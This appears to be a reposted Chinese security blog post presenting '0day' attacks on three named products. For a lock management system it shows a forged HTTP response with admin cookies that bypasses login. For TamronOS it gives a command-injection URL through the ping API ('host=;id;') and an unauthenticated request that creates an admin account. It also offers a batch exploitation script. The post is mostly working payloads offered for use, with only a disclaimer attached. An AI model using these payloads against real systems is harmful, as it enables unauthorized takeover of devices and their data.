多个系统0day公开

admin 2021年10月28日05:46:15安全文章评论49 views924字阅读3分4秒阅读模式

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


锁群管理系统登录绕过

首先我们直接登录,账号密码随便输入(抓包):

多个系统0day公开

拦截返回包,并修改返回包为以下内容:


HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319Set-Cookie: username=%e7%ae%a1%e7%90%86%e5%91%98; path=/Set-Cookie: code=admin; path=/Set-Cookie: power=1; path=/Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/X-Powered-By: ASP.NETDate: Thu, 27 May 2021 05:04:46 GMTConnection: closeContent-Length: 1
0

登录失败的返回包:

多个系统0day公开

替换返回包为上面的内容后放包即可登录成功,且权限为超管:

多个系统0day公开

多个系统0day公开

百傲瑞达系统RCE

百傲瑞达系统由于采用了不安全的框架系统,存在命令执行漏洞,攻击者可利用此漏洞获取主机权限。

直接使用工具进行检测即可:

多个系统0day公开

TamronOS系统RCE+未授权

命令执行:

/api/ping?count=5&host=;id;&port=80&rnd=0.8134504964348999&source=127.0.0.1&type=icmp

多个系统0day公开

脚本支持批量和单个利用(文末回复即可下载):

多个系统0day公开

未授权加账号:

/api/manager/submit?group=1&password=admin1&rnd=0.40221801979163585&status=1&username=amdin1

多个系统0day公开

使用admin1/admin1即可登录


脚本回复:TamronOSRCE

本文始发于微信公众号(Fight Tigers Team):多个系统0day公开

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月28日05:46:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  多个系统0day公开 http://cn-sec.com/archives/400938.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: